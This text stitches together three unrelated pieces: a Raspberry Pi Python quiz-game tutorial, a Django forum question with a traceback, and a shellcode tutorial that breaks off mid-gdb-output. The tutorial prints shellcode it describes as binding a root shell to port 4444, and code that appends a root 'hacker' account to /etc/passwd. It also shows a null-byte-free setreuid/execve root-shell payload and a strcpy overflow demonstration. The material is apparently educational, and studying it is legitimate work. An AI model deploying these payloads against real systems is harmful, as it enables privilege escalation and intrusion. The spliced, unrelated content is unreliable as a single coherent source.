30: print(question, choices[0], choices[1], 31: choices[2], choices[3], 32: correct_response, trivia) 33: Line 1 through 7 are typical of what we've done for the past several scripts, with the exception of line 2. On that line we specify that this document or script is following not ASCII, not ISO8859-1 but UTF-8 for the encoding of the characters. In this particular case we do not need it, but if we had to use accented letters, or special glyphs ( for a card game, the heart, spade, diamond and clover glyphs, for example) then we would need this. Python 3 defaults to UTF-8, so it is a good idea to start learning about unicode and UTF-8, even though we are writing Python 2.x code right now. Line 8 is simply some instructions for an editor named vim. Line 10 is where we import the regular expression module we just discussed. This is part of the Python library, so no need to download anything. This follows the "batteries included" pattern of Python. For general programming, you typically dont need to download anything else. For domain specific applications however, you will need to download and install other modules (like web.py, matplotlib, pygame, scipy etc) Line 12, we are opening a file named short.txt, in the 'r' (or read) mode. 12: with open('short.txt', 'r') as f: This is quite alien looking for some having a background in another language, such as C. In fact, it is also possible to open a file this way: f = open('short.txt', 'r') However, by using the statement with, we get exception handling and graceful housekeeping for free. We dont have to use try, except and finally, it is done implicitly. So just use this form. Line 13, we have a for loop, and just like we did with the PINS in the previous article, we are getting items from an object. For PINS it was either a tuple or a list, both of which can be iterated by a for loop. In this case, we use a file object named f, which we obtained by calling open(). This is different than, say, a file descriptor in C/C++ (which is what fopen() in these languages would return) where it is only a reference to be used by other functions to do stuff. In Python, it is an object that, when an iteration is requested, will give us one item. For files, it will be one line. We could have also used a different variable name: for blah in filewould get me a whole line in variable blah. Line 14, we use a built-in, len() to tell us if we are dealing with an actual line with some data, or just a blank line, based on the length of the line. Let me isolate the next 5 lines so we can focus on them: 15: match = re.search(r'^([\w ]+)-([\w ,-]+)\.(.+)', line) 16: if match: 17: answer = match.group(1).strip() 18: trivia = match.group(2).strip() 19: question = match.group(3).strip() Now, the scary part, line 15. The regular expression. You'll just have to trust me that it works as intended. In the workshop I couldn't go into all the details. Similarly, this article would be way too long if I did, but I'll try to do it anyway... The actual regular expression is this: ^([\w ]+)-([\w ,-]+)\.(.+) The caret (^) is to start the match at the beginning of the line. The first group in parenthesis will match an alphanumeric character (\w) or a space (anything listed between the two square braces), while the + says to repeat it for as long as you can: ([\w ]+) But we also follow this with a dash (-) and so it will stop the first group just before the dash. This separates the answer, from the trivia about the answer. The square brackets delimit a set of what characters should match ( think of it as a Python list with no commas). This is convenient, because in the second group, we want to get the trivia, which includes not only alphanumeric or 'word characters', but also spaces commas and dashes: ([\w ,-]+) The + repeats the match until the next rule, the period. It has to be escaped, because a period means match any character. We want it to match an actual period, so we escape it with a backslash (\). The last group uses the period to match any character and wont stop until the end of the line. To actually use this whole regular expression in our Python code, we have to put it in a string. In python we can use the single or double quote mark for strings ( 'a_string' , "also_a_string" ). In this case however, not just any string, a raw string. We do this by adding a r at the beginning: r'a_string'. That way we do not have to escape the backslash. And we pass that, along with our line to the search() function of the re module. This returns a match object only if there is an actual match, so we have to test for existence of such on line 16, before we can use it on lines 17-19. There, we get the data from the groups we defined (defined in the regular expression by the parenthesis pairs) and assign them to variables: answer, trivia and question. Wow, lots of explanation for only 5 lines of code! But that is the nature of the regular expression beast. As I said, often, it is not the answer, but when it is, we just have to live with its denseness... Line 20 is just setting up (or clearing) a list to store the multiple choice answersthat will follow. Yes, that is right, we haven't dealt with those yet... Line 21 is the else tied to the existence of a match. Basically, if we couldn't match the first regular expression we wrote, that means we are probably dealing with one of the multiple choice answers. This next part could have been done without regular expressions, but since we spent all this time explaining them, let's use them again on line 22, this time with only 2 groups defined. The first will have the a-d letter and the second the description. Line 23, we test again for a match. Line 24, we get the match.group() without specifying which of the group we want. By doing this, we get the whole match. We further use the strip() function to remove any leading or trailing white spaces, and we then append this to our choices list. Initially it is empty, and we add to it the multiple choices until the last choice (d). Let me put the last piece of code repeated here: 25: choice = match.group(1) 26: description = match.group(2).strip() 27: if description == answer: 28: correct_response = choice 29: if choice == 'd': 30: print(question, choices[0], choices[1], 31: choices[2], choices[3], 32: correct_response, trivia) Here, on line 25 we get the letter (a-d) assigned to choice. We then get the description on line 26 (using strip() again to remove leading and trailing white spaces). We can then use this description to compare it (line 27) to the answer we picked up earlier. If the answer is on that line, we then assign to correct_response that letter. Furthermore, if we are on the last line of the multiple choice answers, we are now ready to either store the whole group of question, choices, correct response and trivia, or in this case (lines 30-32) to print it. We could also have passed the file to the regular expression and write a single regular expression getting all the data we wanted on multiple lines at once, but the sheer complexity of it would have rendered this tutorial useless. Simple Quiz In piquiz.py, we keep things simple (relatively... !) again. It is a basis that can be evolved into something a bit more interesting. Just a straight script, a trivia game in 50 lines of code (a little bare bone obviously with no scoring): 1: #!/usr/bin/env python 2: # -*- coding: utf-8 -*- 3: """ 4: PiQuizMachine - A quiz game for the Raspberry Pi. 5: Loads questions and answers from quiz data file. It follows the format 6: from triviachamp.com 7: """ 8: # vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4 9: 10: import re 11: import random 12: 13: data = [] 14: with open('questions.txt', 'r') as f: 15: for line in f: 16: if len(line) > 1: 17: match = re.search(r'^([\w ]+)-([\w ,-]+)\.(.+)', line) 18: if match: 19: answer = match.group(1).strip() 20: trivia = match.group(2).strip() 21: question = match.group(3).strip() 22: choices = [] 23: else: 24: match = re.search(r'\s+(\w)\.([\w ,-]+)', line) 25: if match: 26: choices.append(match.group().strip()) 27: choice = match.group(1) 28: description = match.group(2).strip() 29: if description == answer: 30: correct_response = choice 31: if choice == 'd': 32: entry = (question, choices[0], choices[1], 33: choices[2], choices[3], 34: correct_response, trivia) 35: data.append(entry) 36: 37: random.shuffle(data) 38: for question,choice_a,choice_b,choice_c,choice_d,\ 39: correct_response,trivia in data: 40: print question 41: print choice_a 42: print choice_b 43: print choice_c 44: print choice_d 45: team_answer = raw_input("Your answer:") 46: if team_answer == correct_response: 47: print "That is correct, the answer is",correct_response 48: print trivia 49: else: 50: print "Not correct." Up to line 31, it is almost the same as we already discussed (but using the full size questions.txt file). 32-34, instead of printing, we now store this entry into a list named data, which we initialized empty on line 13. We are now going to randomize or shuffle the list of questions on line 37. On line 11 we imported the random module which includes a shuffle function. This is very convenient for games, not just for a quiz, but really interesting for a card game. We could define a card deck as a list, then shuffle it. On line 38 and 39 (the backslash makes it as if it was a single line), we now loop through all the questions in the data list using a for loop. We then print the question and multiple choices on lines 40 through 44. I'm using a print syntax of a statement, but make note that starting with Python 3, print is a function. The next code example uses the print() function syntax (works in python 2.7 and 3). Lines 38-44: This can all be coded in a prettier way, but in order to keep this as simple as I can, I just did it by specifying all the fields so it is very obvious what we are doing. Line 45 allows us to get an answer from a keyboard, with a prompt of "Your answer:". We check if the answer is correct on line 46 and if so print a message and the trivia tied to the answer on lines 47 and 48. If the answer was wrong (else) we print a different message on line 50. So that is the basic coreof a quiz program. The Real Deal Combining the code we've done in the button/quiz*.py scripts in the previous article, with the code above, we have all the ingredients to make an interactive quiz machine, one where each of the four teams or players gets a game controller, and will be able to "buzz" in first to answer, much as in TV games, such as Jeopardy or Family Feud. This code was designed to teach about Python and GPIOs for a workshop and it is what I would call "squeaky clean". It is kept on purpose simple, yet demoes several key features of Python and the GPIOs. The code was run through pep8 and pylint and is properly documented and formatted (even having 2 blank lines between functions, no use of ; etc), is quite verbose ( several things were done in multiple lines but in normal use I would probably do as one) and yet, is less than 100 physical lines of code. 1: #!/usr/bin/env python 2: # -*- coding: utf-8 -*- 3: """ 4: PiQuizMachine - A quiz game for the Raspberry Pi. 5: Loads questions and answers from quiz data file. It follows the format 6: from triviachamp.com. Lock out through pushbutton controllers 7: """ 8: 9: __author__ = "Francois Dion" 10: __email__ = "[email protected]" 11: 12: import re 13: import random 14: import RPi.GPIO as gpio 15: 16: PINS = (22, 23, 24, 25) # list of pins as tuple 17: OFFSET = 21 # team number to GPIO pin offset 18: 19: 20: def loadtrivia(filename): 21: """ Load the trivia into a list, after extracting the fields """ 22: data = [] 23: with open(filename, 'r') as f: 24: for line in f: 25: if len(line) > 1: 26: match = re.search(r'^([\w ]+)-([\w ,-]+)\.(.+)', line) 27: if match: 28: answer = match.group(1).strip() 29: trivia = match.group(2).strip() 30: question = match.group(3).strip() 31: choices = [] 32: else: 33: match = re.search(r'\s+(\w)\.([\w ,-]+)', line) 34: if match: 35: choices.append(match.group().strip()) 36: choice = match.group(1) 37: description = match.group(2).strip() 38: if description == answer: 39: correct_response = choice 40: if choice == 'd': 41: entry = (question, choices[0], choices[1], 42: choices[2], choices[3], 43: correct_response, trivia) 44: data.append(entry) 45: return data 46: 47: 48: def getteam(lockedout): 49: """ figure out which team presses their button first """ 50: poll = [pin for pin in PINS if pin - OFFSET not in lockedout] 51: while True: 52: buttons = [gpio.input(pin) for pin in poll] # list comprehension 53: if False in buttons: # at least one button was pressed 54: if buttons.count(False) == 1: 55: return buttons.index(False) + 1 56: else: # trouble, multiple buttons 57: teams = [i for i, b in enumerate(buttons) if b is False] 58: return random.choice(teams) 59: 60: 61: def main(): 62: """ our main program """ 63: data = loadtrivia('questions.txt') 64: 65: gpio.setmode(gpio.BCM) # broadcom mode, by GPIO 66: for pin in PINS: 67: gpio.setup(pin, gpio.IN) # set pins as INput 68: random.shuffle(data) 69: for question, choice_a, choice_b, choice_c, choice_d, \ 70: correct_response, trivia in data: 71: # if we wanted to make a graphical game using pygame 72: # we would replace the print statements below 73: print(question) 74: print(choice_a) 75: print(choice_b) 76: print(choice_c) 77: print(choice_d) 78: lockedout = [] # we start with no team locked out 79: while len(lockedout) < 4: 80: team = getteam(lockedout) 81: prompt = "Your answer, team {0}? ".format(team) 82: team_answer = raw_input(prompt) # get an answer 83: if team_answer == correct_response: 84: print("That is correct, the answer is:") 85: print(correct_response) 86: print(trivia) 87: print("") 88: lockedout = [1, 2, 3, 4] 89: else: 90: print("That is not the answer.") 91: lockedout.append(team) 92: 93: 94: if __name__ == "__main__": 95: try: 96: main() 97: except KeyboardInterrupt: 98: print("Goodbye") 99: gpio.cleanup() Lines 1 to 16 should be familiar. I did add two variables for author and email. This is just a convention some people do in their code. Line 17 I'm defining an offset between the team number (1,2,3,4) and the GPIOs (22,23,24,25). Lines 20 through 45 is the code from the previous example, but put into a function that accepts a file name for the quiz data and that upon execution, will return a list containing all our questions. lines 48 through 58 is our quiz4.py code from the previous article, put into a function, but with a twist: On line 52, instead of using directly the PINS tuple, we filter it first on line 50 to see which pins we should really poll. When getteam() is called, a list of teams that have been locked out is provided. We are not even going to check these teams button controllers, because they answered this question already, with a wrong answer. 50: poll = [pin for pin in PINS if pin - OFFSET not in lockedout] So, what is happening here merits an explanation. You've probably recognized this as a list comprehension (which we've introduced in the previous article). But it looks strange... Let's read it. We will add to this list a pin, from an iteration of the PINS tuple (containing 22,23,24,25), but we will do this only if the pin minus the offset (21) is not in the list of locked out teams. So, if we take 22 - 21, that is 1. If team 1 is locked out, the list stays empty and continues on to the next value and test it. So on and so forth. I mentioned earlier we had just touched the tip of the list comprehensions. here we went a little deeper, but it goes on. Lines 51-58, we loop until a button is pressed. If only one button was pressed at the exact same time, we are good to go, and return which of the teams (1 - 4) pressed the button first. But troubleis looming on the horizon. It is possible for 2 or more buttons to be pressed at the exact same moment. We thus have to introduce some random process to select one of those that have been captured as pressed. We do that on lines 57 and 58. 58 uses the choice() function of the random module (imported on line 13), but 57 requires some explanation, for those who are just starting with Python: 57: teams = [i + 1 for i, b in enumerate(buttons) if b is False] We want to generate a list of all the teams that had pressed their buttons. buttons is a list containing something like [False, True, True, False], indicating here that team 1 and 4 pressed their button at the same time. What I now want is a list containing [1, 4] to select randomly from it. So what we do is to use a built in function called enumerate() on that buttons list. This returns the index ( starting at zero) and the value, so we capture this with a for i, b. We will assign i (the zero based index) + 1 (to get a team number) to the list, but only if b (the value) is False. There, that wasn't so bad, after all! We are now ready for our main() function, lines 61 to 91 (only 30 lines). On line 63 we load the data from the file questions.txt Lines 65-67, we set up the GPIOs, as we've done in quiz4.py. Lines 68-77 is the logic we had in our previous example: piquiz.py At line 78, we initialize the list of locked out teams to be empty, and start a loop on line 79 that will go on until we have 4 teams locked out by 4 wrong answers, or a right answer (which forces all 4 teams to be locked out). Line 80 is where we poll the button controllers until we have somebody pressing a button. 81: prompt = "Your answer, team {0}? ".format(team) 82: team_answer = raw_input(prompt) # get an answer Lines 81 and 82 are asking for an answer from the team that pushed their button first. This answer is given using the keyboard. Line 81 could also have been written as: prompt = "Your answer, team " + str(team) + "?" This is closer to what is done in other languages, but each concatenation with + creates a new resulting object. As such, it is a less efficient way of doing it, and if used in a loop with lots of data, will consume a lot of memory and be slow. lines 83-88 handle a correct answer (concluding by locking out all teams to force a new question), while lines 89-91handle a wrong one, adding that one team to the list of locked out teams (passed to the function on line 80) 94: if __name__ == "__main__": 95: try: 96: main() 97: except KeyboardInterrupt: 98: print("Goodbye") 99: gpio.cleanup() Lines 94-99 repeat the safeguard pattern we established in our previous article, in quiz4.pyon lines 21-25 There you go, a complete gamewith Raspberry Pi GPIO hardware integration, that can be played with friends, in less than 100 lines of python code. Team 2 is smoking! Two correct answers in a row Conclusion I've avoided classes and methods on purpose. These would have complicated things too much for the workshop audience (which ranged from teenagers to adults and from some who had never programmed in python, to some who had written a good bit). Several also had a background in basic and shell scripts, so I did a good bit as straight scripts, without functions, waiting to the end to introduce these concepts. I've also added a bit more code than in the workshop in order to provide a better reference after the fact. I hope it is useful to others, and if you are in the area, make sure to keep an eye for our next PyHack Workshop. Let me know if I've provided enough details, what things I could have explained more etc.
I've been getting this error "invalid literal for int() with base 10: 'user3' " when I try to retrieve an object from FacebookProfile. It doesn't give any error when getting by id or any int datatype. def index(request): current_user = request.user current_username = str(current_user.username) fbuser=FacebookProfile.objects.get(user__exact = current_username) iden=fbuser.access_token facebook = OpenFacebook(iden) info = facebook.get('me') html = "info: %s" % info output = html + 'current_user.username: ' + current_user.username return HttpResponse(output) Traceback: Traceback: File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/django/core/handlers/base.py" in get_response 114. response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/Users/josephtang/Dropbox/Code/SocialORD/ORDapp/views.py" in index 40. leme=FacebookProfile.objects.get(user__exact = current_username) File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/django/db/models/manager.py" in get 151. return self.get_queryset().get(*args, **kwargs) File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/django/db/models/query.py" in get 298. clone = self.filter(*args, **kwargs) File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/django/db/models/query.py" in filter 590. return self._filter_or_exclude(False, *args, **kwargs) File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/django/db/models/query.py" in _filter_or_exclude 608. clone.query.add_q(Q(*args, **kwargs)) File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/django/db/models/sql/query.py" in add_q 1198. clause = self._add_q(where_part, used_aliases) File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/django/db/models/sql/query.py" in _add_q 1232. current_negated=current_negated) File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/django/db/models/sql/query.py" in build_filter 1122. lookup_type, value) File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/django/db/models/fields/related.py" in get_lookup_constraint 1105. value[index]), AND) File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/django/utils/tree.py" in add 104. data = self._prepare_data(data) File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/django/db/models/sql/where.py" in _prepare_data 79. value = obj.prepare(lookup_type, value) File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/django/db/models/sql/where.py" in prepare 352. return self.field.get_prep_lookup(lookup_type, value) File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/django/db/models/fields/__init__.py" in get_prep_lookup 369. return self.get_prep_value(value) File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/django/db/models/fields/__init__.py" in get_prep_value 613. return int(value) Exception Type: ValueError at /ORDapp/ Exception Value: invalid literal for int() with base 10: 'user3'
It's not an easy task to find a vulnerable service and find an exploit for it. It's also not easy to defend against users who might want to exploit your system, if you are a system administrator. However, writing an exploit by yourself, to convert a news line from bug tracker into a working lockpick, is much more difficult. This article is not a guide on writing exploits, nor an overview of popular vulnerabilities. This is a step-by-step guide on developing a shellcode, a crucial point of any exploit software. Hopefully, learning how they work will help conscientious and respectable developers and system administrators to understand how malefactors think and to defend their systems against them. Take any exploit downloaded from the internet that promises you an easy root shell on a remote machine, and examine its source code. Find the most unintelligible piece of the code; it will be there, for sure. Most probably, you will find a several lines of strange and unrelated symbols; something like this: char shellcode[] = "\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8a" "\xd4\xf2\xe7\x83\xeb\xfc\xe2\xf4\xbb\x0f\xa1\xa4\xd9\xbe\xf0\x8d" "\xec\x8c\x6b\x6e\x6b\x19\x72\x71\xc9\x86\x94\x8f\x9b\x88\x94\xb4" "\x03\x35\x98\x81\xd2\x84\xa3\xb1\x03\x35\x3f\x67\x3a\xb2\x23\x04" "\x47\x54\xa0\xb5\xdc\x97\x7b\x06\x3a\xb2\x3f\x67\x19\xbe\xf0\xbe" "\x3a\xeb\x3f\x67\xc3\xad\x0b\x57\x81\x86\x9a\xc8\xa5\xa7\x9a\x8f" "\xa5\xb6\x9b\x89\x03\x37\xa0\xb4\x03\x35\x3f\x67"; This is shellcode, also sometimes referred to as "bytecode." Its content is not a magic word or random symbols. This is a set of low-level machine commands, the same as are in an executable file. This example shellcode opens port 4444 on a local Linux box and ties a Bourne shell to it with root privileges. With a shellcode, you can also reboot a system, send a file to an email, etc. The main task for an exploit program is therefore to make this shellcode work. Take, for example, a widely known error-buffer overflow. Developers often check data that has been received as input for functions. A simple example: the developer creates a dynamic array, allocates for it 100 bytes, and does not control the real number of elements. All elements that are out of the bounds of this array will be put into a stack, and a so-called buffer overflow will occur. An exploit's task is to overflow a buffer and, after that, change the return address of system execution to the address of the shellcode. If a shellcode can get control, it will be executed. It's pretty simple. As I already said, this article is not a guide for writing exploits. There are many repositories with existing shellcodes (shellcode.org, Metasploit); however, it is not always enough. A shellcode is a low-level sequence of machine commands closely tied to a dedicated processor architecture and operating system. This is why understanding how it works can help prevent intrusions into your environment. To follow along, I expect you to have at least minimal assembly knowledge. As a platform for experiments, I chose Linux with a 32-bit x86 processor. Most exploits are intended for Unix services; therefore, they are of most interest. You need several additional tools: Netwide Assembler (nasm), ndisasm, and hexdump. Most Linux distributions include these by default. Shellcode stubs are usually written in assembler; however, it is easier to explain how one works by building it in C and then rewriting the same code in assembly. This is C code for appending a user into /etc/passwd: #include <stdio.h> #include <fcntl.h> main() { char *filename = "/etc/passwd"; char *line = "hacker:x:0:0::/:/bin/sh\n"; int f_open; f_open = open(filename,O_WRONLY|O_APPEND); write(f_open, line, strlen(line)); close(f_open); exit(0); } All of the code is pretty simple, except maybe the open() function. The constant O_WRONLY|O_APPEND given as a parameter opens the file fact for writing and appends the new data to the end of the file. Here is a more usable example: executing a Bourne shell: #include <stdio.h> main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; setreuid(0, 0); execve(name[0],name, NULL); } The setreuid(0,0) call attempts to obtain root privileges (if it is possible). execve(const char filename,const char[] argv, const char[] envp) is a main system call that executes any binary file or script. It has three parameters: filename is a full path to an executable file, argv[] is an array of arguments, and envp[] is an array of strings in the format . Both arrays must end with a key=valueNULL element. Now consider how to rewrite the C code given in the first example in assembly. x86 assembly executes system calls with help of a special system interrupt that reads the number of the function from the EAX register and then executes the corresponding function. The function codes are in the file /usr/include/asm/unistd.h. For example, a line in this file, #define __NR_ open 5, means that the function open() has the identification number 5. In a similar way, you can find all other function codes: exit() is 1, close() is 6, setreuid() is 70, and execve() is 11. This knowledge is enough to write a simple working application. The /etc/passwd amendment application code in assembly is: section .data filename db '/etc/passwd', 0 line db 'hacker:x:0:0::/:/bin/sh',0x0a section .text global _start _start: ; open(filename,O_WRONLY|O_APPEND) mov eax, 5 mov ebx, filename mov ecx, 1025 int 0x80 mov ebx, eax ; write(f_open, line, 24) mov eax, 4 mov ecx, line mov edx, 24 int 0x80 ; close(f_open) mov eax, 6 int 0x80 ; exit(0) mov eax, 1 mov ebx, 0 int 0x80 It's a well-known fact that an assembly program consists of three segments: the data segment, which contains variables; the code segment containing code instructions; and a stack segment, which provides a special memory area for storing data. This example uses only data and code segments. The operators section .data and section .text mark their beginnings. A data segment contains the declaration of two char variables: name and line, consisting of a set of bytes (see the db mark in the definition). The code segment starts from a declaration of an entry point, global _start. This tells the system that the application code starts at the _start label. The next steps are easy; to call open(), set the EAX register to the appropriate function code: 5. After that, pass parameters for the function. The most simple way of passing parameters is to use the registers EBX, ECX, and EDX. EBX gets the first function parameter, the address of the beginning of the filename string variable, which contains a full path to a file and a finishing zero char (most system functions operating with strings demand a trailing null). The ECX register gets the second parameter, giving information about file open mode (a constant O_WRONLY|O_APPEND in a numeric format). With all of the parameters set, the code calls interrupt 0x80. It will read the function code from EAX and calls an appropriate function. After completing the call, the application will continue, calling write(), close(), and exit() in exactly the same way. That was fun. Now it's time to translate the second program into assembly; one that executes setreuid() and execve() to run a root shell: section .data name db '/bin/sh', 0 section .text global _start _start: ; setreuid(0, 0) mov eax, 70 mov ebx, 0 mov ecx, 0 int 0x80 ; execve("/bin/sh",["/bin/sh", NULL], NULL) mov eax, 11 mov ebx, name push 0 push name mov ecx, esp mov edx, 0 int 0x80 Most of this code is similar to the previous example except for the execve() function call. The same program segments are there, and the same execution method works for setreuid(). The second parameter of execve() is an array of two elements. It is reasonable to pass this through the stack, which first needs a zero value (push 0), and then an address for the variable name (push name). This is a stack, so remember to push parameters in reverse order--LIFO, or "last in, first out." When the system call pulls its parameters out, the first will be the name variable address, and then a zero value. A function must also know where to find its parameters. For that, this code uses the enhanced stack pointer (ESP) register, which always points to the top of the stack. The only other work is to copy the contents of the ESP register to ECX, which will be used as a second parameter when calling the 0x80 interrupt. That assembly code works completely. However, it is useless. You can compile it with nasm, execute it, and view the binary file in hex form with hexdump, which is itself a shellcode. The problem is that both programs use their own data segments, which means that they cannot execute inside another application. This means in chain that an exploit will not be able to inject the required code into the stack and execute it. The next step is to get rid of the data segment. There exists a special technique of moving a data segment into a code segment by using the jmp and call assembly instructions. Both instructions make a jump to a specified place in the code, but the call operation also puts a return address onto the stack. This is necessary for returning to the same place after the called function successfully executes to continue the program's execution. Consider the code: jmp two one: pop ebx [application code] two: call one db 'string' At the beginning, the program execution jumps to a two label, attached to a call to the procedure one. There is no such procedure, in fact; however, there is another label with this name, which obtains control. At the moment of this call, the stack receives a return address: the address of the next instruction after call. In this code, the address is that of a byte string: db 'string'. This means that when the instructions located after one label execute, the stack already contains the address of a string. The only thing left to do is to retrieve this string and use it appropriately. Here's that trick in a modified version of the second example, named shell.asm: BITS 32 ; setreuid(0, 0) mov eax, 70 mov ebx, 0 mov ecx, 0 int 0x80 jmp two one: pop ebx ; execve("/bin/sh",["/bin/sh", NULL], NULL) mov eax, 11 push 0 push ebx mov ecx, esp mov edx, 0 int 0x80 two: call one db '/bin/sh', 0 As you can see, there are no more segments at all now. The string /bin/sh, which was previously in a data segment, now comes off of the stack and goes into the EBX register. (The code also has a new directive, BITS 32, which enables 32-bit processor optimization.) Compile the program with nasm: $ nasm shell.asm And dump its code with hexdump: $ hexdump -C shell Figure 1 shows a typical shellcode. The next step is to convert it into a better format by preceding each byte with \x, and then putting all of the code into a byte array. Now check that it works: char code[]= "\xb8\x46\x00\x00\x00\xbb\x00\x00\x00\x00\xb9\x00\x00\x00\x00\xcd" "\x80\xe9\x15\x00\x00\x00\x5b\xb8\x0b\x00\x00\x00\x68\x00\x00\x00" "\x00\x53\x89\xe1\xba\x00\x00\x00\x00\xcd\x80\xe8\xe6\xff\xff\xff" "\x2f\x62\x69\x6e\x2f\x73\x68\x00"; main() { int (*shell)(); (int)shell = code; shell(); } Try to compile and run it: $ gcc -o shellApp $ ./shellApp It works! NULL Bytes Now the shellcode does not use the data segment and even works inside of a C tester program, but it still will not work inside a real exploit. The reason are the numerous NULL bytes (\x00). Most buffer overflow errors are related to C stdlib string functions: strcpy(), sprintf(), strcat(), and so on. All of these functions use the NULL symbol to indicate the end of a string. Therefore, a function will not read shellcode after the first occurring NULL byte. Thus, the next task is to get rid of all null bytes in the shellcode. The idea is simple: find pieces of code that cause null bytes to appear and change them. A mature developer, in most cases, can say why machine code contains zeroes, but it's easy to use a disassembler to identify such instructions: $ nasm shell.asm $ ndisasm -b32 shell 00000000 B846000000 mov eax,0x46 00000005 BB00000000 mov ebx,0x0 0000000A B900000000 mov ecx,0x0 0000000F CD80 int 0x80 ... Executing this command will give the disassembled code of a program. It will contain three columns. The first column contains the instruction's address in hexadecimal form. It is not very important. The second column contains machine instructions, the same as shown with hexdump. The third column contains an assembly equivalent. This column will give you an idea which instructions contain null bytes in a shellcode. After a brief review of a dump contents, it becomes evident that most null bytes come from instructions that manage the contents of registers and the stack. This is no surprise; this code works in a 32-bit mode, so the computer allocates a four-byte memory space for each numeric value. Yet the code uses only values for which one byte is enough. For example, the beginning of the program has the instruction mov eax, 70 to put the value 70 into the EAX register. In the shellcode, this instruction looks like B8 46 00 00 00. B8 is the machine code of the instruction mov ax, and 46 00 00 00 is the value 70 in hexadecimal notation, padded with zeroes to the size of four bytes. Many null bytes appear for similar reasons. The solution for this problem is very simple. It's enough to remember that 32-bit registers (EAX, EBX, and other registers whose names begin with "E," for "enhanced") can be represented by 8-bit and 16-bit registers. It's enough to use a 16-bit register AX instead and even its low and high parts, AL and AH, which are one-byte registers. Just replace the instruction mov eax, 70 with mov al, 70 in all such places. It's important to be sure that the rest of the EAX register space does not contain any garbage; that is, the code must put a zero value into EAX without using any null bytes. The fastest and most effective way of doing this is with the XOR logical function: xor eax,eax will give the EAX register a zero value. Even after these modifications, the shellcode still contains zero bytes. The debugger shows that now the jmp instruction causes trouble: E91500 jmp 0x29 0000 add [bx+si],al The trick is to use a short jump instruction instead of the usual jmp short. In short programs with simple structure these instructions work in absolutely the same way, and the machine code in this case will not contain zero bytes. You may now think that this shellcode is ideal, but at the end there is still one remaining zero byte. This zero byte occurs because the string bin/sh has a null byte indicating the end of the string. This is a definite requirement, because otherwise execve() will not work properly. You cannot just remove this byte. You can use one more assembler trick: at the compiling and binding stage, store any other symbol instead of zero, and convert it into zero while processing the program: jmp short stuff code: pop esi ; address of string ; now in ESI xor eax,eax ; put zero into EAX mov byte [esi + 17],al ; count 18 symbols (index starts from zero) ; and putting a zero value there (EAX register equals to zero) ; The string will become This is my string0 stuff: call code db 'This is my string#' After using this trick, the shellcode will contain no null bytes: BITS 32 ;setreuid(0, 0) xor eax,eax mov al, 70 xor ebx,ebx xor ecx,ecx int 0x80 jmp short two one: pop ebx ; execve("/bin/sh",["/bin/sh", NULL], NULL) xor eax,eax mov byte [ebx+7], al push eax push ebx mov ecx, esp mov al,11 xor edx,edx int 0x80 two: call one db '/bin/sh#' After compiling this code, you can now see that it no longer contains null bytes. It's worth mentioning that the problem may arise not only because of null bytes, but because of other special symbols; for example, the end-of-line symbols, in some cases. A buffer overflow exploit tries to write beyond a buffer on the stack so that when the function returns, it will jump to some code that most often starts a shell instead of returning to the function that called the current function. To understand how it works, you have to know how the stack works and how functions are called in C. The stack starts somewhere in the top of memory and the stack pointer moves down as the program pushes things onto the stack and back up as the code pops them off again. Given the C function: void sum(int a,int b) { int c = a + b; } The stack inside of sum() will look like this: b a <return address> <ebp contents> c The computer saves the contents of the EBP register to a stack before calling the sum() function because it will be used inside of the function, so it can be restored from the stack after returning from the function. The goal of an exploit is to change the return address. This is not possible in this case, because no matter what a and b are, the result cannot overflow c into the EBP contents on the stack and the return address. If c were a string instead, it might be possible to write past it. Here is an overflow-exploitable program: #include <stdio.h> void sum(int a,int b) { int c = a + b; } void bad_copy_string(char *s) { char local[1024]; strcpy(local,s); printf("string is %s\n",local); } int main(int argc, char *argv[]) { sum(1,2); bad_copy_string(argv[1]); } The function copy_string makes a copy of the first command-line parameter of the program into a buffer of a fixed size and then prints it out. This might look stupid, but something like this is quite common for programs that need to perform actions based on external input, either from the command line or a socket connection. Compile this victim code and run it: % gcc -o overflow overflow.c % ./overflow 'All seems fine' string is All seems fine Everything seems indeed right, but call it with a parameter longer than 1024 characters: % ./overflow `perl -e 'print "a" x 2000'` string is aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa bash: segmentation fault (core dumped) ./overflow `perl -e 'print "a" x 2000'` The Perl script above generates a string of 2000 a symbols. Now run the core file through gdb: % gdb ./overflow core GNU gdb 2002-04-01-cvs Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-linux". Core was generated by `aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa'. Program terminated with signal 11, Segmentation fault. Reading symbols 